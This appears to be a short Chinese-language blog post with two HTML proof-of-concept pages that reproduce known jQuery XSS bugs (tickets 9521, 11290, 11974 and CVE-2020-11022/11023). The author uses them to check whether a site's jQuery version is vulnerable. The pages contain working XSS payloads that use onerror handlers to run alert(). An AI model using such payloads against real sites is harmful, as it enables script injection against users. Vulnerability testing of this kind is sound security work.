jquery xss测试复现

最近有用到了水洞jquery,但是每次忘记咋测试,写个教程记录一下。

将下列代码保存为html

html

<!DOCTYPE html>

<html lang="zh">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>Jquery XSS</title>

    <script type="text/javascript" src="https://code.jquery.com/jquery-3.5.0.js"></script>

    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> -->

    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> -->

    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> -->

    <script>

        $(function () {

            // #9521

            // #11290

            $(location.hash);

            // #11974

            $('#bug').on('click', function () {

                $.parseHTML("<img src='z' onerror='alert(\"bug-11974\")'>");

                return false;

            });

        })

    </script>

</head>

<body>

    <h1>jQuery with XSS</h1>

    <h2>Demo:</h2>

    <p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p>

    <ul>

        <li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <a

                href="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li>

        <li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <a

                href="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li>

        <li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974"

                target="_blank">ticket</a></li>

    </ul>

    <h2>Test version:</h2>

    <ul>

        <li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li>

    </ul>

    <h2>Safe version:</h2>

    <ul>

        <li>1.12.0, 1.12.1 </li>

        <li>2.2.0, 2.2.1</li>

        <li>3.0.0, 3.0.1, 3.1.0, 3.1.1</li>

    </ul>

</body>

</html>

下面是2020cve的

标题内容

<!DOCTYPE html>

<!-- saved from url=(0055)https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html -->

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    

    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>

<script type="text/javascript" src="https://code.jquery.com/jquery-3.5.0.js"></script>

</head>

<body>

<script>

function test(n,jq){

    sanitizedHTML = document.getElementById('poc'+n).innerHTML;

    if(jq){

        $('#div').html(sanitizedHTML);

    }else{

        div.innerHTML=sanitizedHTML;

    }

}

</script>

<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>

<h2>PoC 1</h2>

<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>

<xmp id="poc1">

<style><style /><img src=x onerror=alert(1)> 

</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>

<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>

<xmp id="poc2">

<img alt="<x" title="/><img src=x onerror=alert(1)>">

</xmp>

<h2>PoC 3</h2>

<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>

<xmp id="poc3">

<option><style></option></select><img src=x onerror=alert(1)></style>

</xmp>

<div id="div"></div>

</body></html>

用的时候把https://code.jquery.com/jquery-3.5.0.js改成你要测试的js文件地址就行。

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注